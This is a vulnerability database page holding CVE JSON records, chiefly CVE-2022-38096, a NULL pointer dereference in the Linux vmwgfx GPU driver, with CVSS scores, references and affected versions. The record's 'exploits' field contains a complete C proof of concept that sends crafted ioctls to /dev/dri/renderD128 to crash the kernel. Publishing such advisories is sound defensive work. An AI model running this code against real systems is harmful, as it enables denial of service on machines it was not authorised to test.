          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-36402",
    "datePublished": "2022-09-16T16:08:01.414Z",
    "dateReserved": "2022-09-07T00:00:00.000Z",
    "dateUpdated": "2024-09-17T03:38:12.736Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-38096 (GCVE-0-2022-38096)

Vulnerability from cvelistv5 – Published: 2022-09-09 14:39 – Updated: 2026-05-12 10:12

Title

There is a NULL pointer vulnerability in vmwgfx driver

Summary

A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

Severity

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Anolis

References

2 references

URL	Tags
https://bugzilla.openanolis.cn/show_bug.cgi?id=2073
https://lists.debian.org/debian-lts-announce/2024…	mailing-list

Impacted products

1 product

Vendor	Product	Version
Linux	kernel	Affected: v4.20-rc1 , < 5.13.0-52* (custom)

Date Public

2022-09-06 00:00

Credits

Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.14",
                "status": "affected",
                "version": "v4.20-rc1",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-38096",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-26T13:45:25.191519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-26T13:49:29.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:45:52.802Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
          },
          {
            "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "defaultStatus": "unknown",
            "product": "SIMATIC S7-1500 TM MFP - GNU/Linux subsystem",
            "vendor": "Siemens",
            "versions": [
              {
                "lessThan": "*",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-12T10:12:29.908Z",
          "orgId": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e",
          "shortName": "siemens-SADP"
        },
        "references": [
          {
            "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
          }
        ],
        "x_adpType": "supplier"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){  \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-25T21:08:05.642Z",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        },
        {
          "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is a NULL pointer vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38096",
    "datePublished": "2022-09-09T14:39:51.163Z",
    "dateReserved": "2022-09-07T00:00:00.000Z",
    "dateUpdated": "2026-05-12T10:12:29.908Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CERTFR-2024-AVI-0164

Solution

CVE-2021-33655 (GCVE-0-2021-33655)

CVE-2022-20368 (GCVE-0-2022-20368)

CVE-2022-2196 (GCVE-0-2022-2196)

CVE-2022-23960 (GCVE-0-2022-23960)

CVE-2022-29581 (GCVE-0-2022-29581)

CVE-2022-3239 (GCVE-0-2022-3239)

CVE-2022-3545 (GCVE-0-2022-3545)

CVE-2022-3625 (GCVE-0-2022-3625)

CVE-2022-36402 (GCVE-0-2022-36402)

CVE-2022-38096 (GCVE-0-2022-38096)

Tags

Sightings

Nomenclature